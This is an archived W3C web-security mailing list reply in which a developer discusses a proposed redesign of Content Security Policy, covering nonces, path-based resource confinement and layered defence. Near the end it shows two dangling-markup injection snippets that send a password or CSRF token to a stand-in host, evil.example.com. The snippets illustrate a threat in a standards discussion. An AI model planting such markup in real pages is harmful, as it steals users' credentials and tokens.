W3C home > Mailing lists > Public > public-webappsec@w3.org > July 2019

Re: A modest content security proposal.

From: Craig Francis <craig.francis@gmail.com>
Date: Mon, 15 Jul 2019 13:14:57 +0100
Message-ID: <CALytEkMQ5kfQFS6N7+_yPq4_GmdCRM59QHAzDdbGF67W3BFRMA@mail.gmail.com>
To: Mike West <mkwst@google.com>
Cc: Web Application Security Working Group <public-webappsec@w3.org>
Hi Mike,

Initial thoughts from a web developer, one that really likes CSP...

I like the idea of the browser providing the nonce, and that being used to
white-list scripting - it feels like a good way to prove the website did
intend to include that script. It also means the browser knows the nonce is
random/unique (where developers should still be careful, you're reflecting
a value back in your HTML).

And simplifying the process by locking down <base>, <object>, "javascript:"
URLs, etc; that should set a good/simplier baseline (where I think "allow"
should be re-named "allow-unsafe", and I would prefer eval to be "block" by
default).

The bit I feel like I'm missing, and it might be because I enjoy applying
multiple layers of protection, is the *Resource Confinement* side.

On my websites, I have a folder for static resources (`php_admin_flag
engine off`), that's under version control, replaced every time the website
is updated (with a diff check before), and it's not writable to by the web
server process (so no user uploaded/replaced content) - I like to ensure
that all JS/CSS/Images/Fonts are loaded from that safe folder, and I can do
that because the CSP specifies specific paths that are served from that
locked-down folder.

A possible solution would be a second domain, but that would slow the page
load time a little bit, make the server config a bit more complex, and
might lose some restrictions - such as the user-uploaded images folder
containing a malicious JavaScript file (will I need a different domain for
each resource type?).

I also dynamically set the CSP for every page - e.g. most pages are ok with
`connect-src 'none'` (from default-src), but when a page/script needs to
use XMLHttpRequest, then I explicitly set the full URL for the 1 API it
needs to access.

The intention is to have layers... 1. my server side code shouldn't have
any XSS vulnerabilities; if it does, 2. CSP should stop the loading of
scripts; if that fails (e.g. a legitimate script was replaced by a hacker),
3. that script should be limited in what it can do to that page.

This also applies to limiting what content can be loaded in frames (e.g.
blocking an iframe from showing a malicious login form, which is why I have
frame-src 'none' for most pages).

And finally, some DOM messing around can cause issues:

   <form action="https://evil.example.com">
   <form action="./">
      <input name="password" />
   </form>

   <img src='https://evil.example.com<form action="./"><input name="csrf"
value="abc123" />...' />...

Maybe introduce Scripting-Policy first; then deprecate the old/un-necessary
parts of CSP, but still keep CSP around with a focus on Resource
Confinement?

Developers can then implement Scripting-Policy as their first job; and when
that's done, add/improve restrictions via CSP?

Craig




On Mon, 15 Jul 2019 at 10:03, Mike West <mkwst@google.com> wrote:

> Hey folks,
>
> As part of a concerted effort to procrastinate on things I actually need
> to get done this week, I sketched out a proposal around an iteration on CSP
> that we've talked about in various venues. TL;DR: Let's break it in half,
> and throw away esoteric junk no one uses. :)
>
> https://github.com/mikewest/csp-next
>
> I'm not sure this is worth anyone spending significant amounts of time on
> at the moment, but it's been in the back of my head for a while, and I
> think it's at least worth discussing, even without concrete plans to
> actually work on it in the near future.
>
> Perhaps it might fuel some TPAC discussion later in the year? WDYT?
>
> -mike
>
Received on Monday, 15 July 2019 12:15:32 UTC

This archive was generated by hypermail 2.3.1 : Monday, 15 July 2019 12:15:33 UTC